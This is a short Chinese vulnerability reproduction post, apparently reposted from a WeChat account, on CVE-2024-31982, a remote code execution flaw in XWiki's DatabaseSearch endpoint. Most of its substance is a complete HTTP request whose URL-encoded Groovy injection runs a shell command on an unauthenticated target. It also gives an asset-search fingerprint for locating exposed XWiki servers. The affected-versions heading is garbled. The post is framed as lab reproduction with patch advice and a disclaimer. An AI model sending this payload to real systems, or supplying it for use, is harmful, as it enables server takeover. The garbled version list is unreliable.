XWiki平台 2.4-milestone-1及之前的版本4.10.20、15.5.4和15.10-rc-1版本
XWiki 是一个由 Java 编写的基于 LGPL 协议发布的开源 wiki 和应用平台。它的开发平台特性允许创建协作式 Web 应用,同时也提供了构建于平台之上的打包应用。该系统/bin/get/Main/DatabaseSearch接口处存在远程代码执行漏洞,未经授权的攻击者可执行任意代码,会导致服务器失陷,请及时修复。
body="data-xwiki-reference"向靶场发送如下数据包,在目标上执行id命令
GET /bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async=false%7D%7D%7B%7Bgroovy%7D%7Dthrow%20new%20Exception%28%27id%27.execute%28%29.text%29%3B%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: close
get请求,可以直接用浏览器访问靶场
漏洞复现成功
建议您更新当前系统或软件至最新版,完成漏洞的修复。
原文始发于微信公众号(AI与网安):CVE-2024-31982 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论